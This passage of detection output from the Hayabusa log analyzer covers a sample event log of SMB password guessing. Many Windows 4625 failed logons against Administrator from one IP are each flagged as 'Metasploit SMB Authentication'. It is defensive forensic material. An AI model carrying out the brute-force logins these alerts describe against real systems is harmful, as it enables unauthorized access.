NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
